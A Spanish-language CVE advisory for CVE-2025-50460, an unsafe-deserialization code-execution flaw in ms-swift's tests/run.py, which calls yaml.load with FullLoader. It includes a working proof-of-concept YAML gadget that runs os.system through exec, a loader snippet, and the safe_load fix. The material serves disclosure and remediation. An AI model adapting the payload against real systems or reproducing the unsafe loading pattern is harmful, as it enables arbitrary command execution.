
Detalles técnicos y exploit para CVE-2025-50460
Estado: Pendiente de Análisis
Este registro CVE ha sido marcado para esfuerzos de enriquecimiento de NVD.Existe una vulnerabilidad de ejecución remota de código (RCE) en el proyecto ms-swift versión 3.3.0 debido a una deserialización insegura en tests/run.py usando yaml.load() de la biblioteca PyYAML (versiones = 5.3.1). Si un atacante puede controlar el contenido del archivo de configuración YAML pasado al parámetro --run_config, se puede ejecutar código arbitrario durante la deserialización. Esto puede llevar a un compromiso total del sistema. La vulnerabilidad se desencadena cuando se carga un archivo YAML malicioso, permitiendo la ejecución de comandos arbitrarios de Python como os.system(). Se recomienda actualizar PyYAML a la versión 5.4 o superior, y usar yaml.safe_load() para mitigar el problema.
Existe una vulnerabilidad de ejecución remota de código (RCE) en el proyecto modelscope/ms-swift debido al uso inseguro de yaml.load() en combinación con versiones vulnerables de la biblioteca PyYAML (≤ 5.3.1). El problema reside en el script tests/run.py, donde un archivo de configuración YAML proporcionado por el usuario se deserializa usando yaml.load() con yaml.FullLoader.
Si un atacante puede controlar o reemplazar el archivo de configuración YAML proporcionado al argumento --run_config, puede inyectar una carga maliciosa que resulte en la ejecución de código arbitrario.
tests/run.pyif args.run_config is not None and Path(args.run_config).exists():
with open(args.run_config, encoding='utf-8') as f:
run_config = yaml.load(f, Loader=yaml.FullLoader)
exploit.yaml)!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"
import yaml
with open("exploit.yaml", "r") as f:
cfg = yaml.load(f, Loader=yaml.FullLoader)
Esto resulta en la ejecución de os.system, demostrando la ejecución de código.
yaml.load() con yaml.safe_load()# Antes
yaml.load(f, Loader=yaml.FullLoader)
# Después
yaml.safe_load(f)
| Campo | Valor |
|---|---|
| ID CVE | CVE-2025-50460 |
| Puntuación CVSS | TBD |
| CWE | CWE-502: Deserialización de datos no confiables |
| Fecha de informe | 2025-04-25 |
| Fecha de divulgación | 2025-07-30 |
| Versión afectada | última |
| Versión corregida |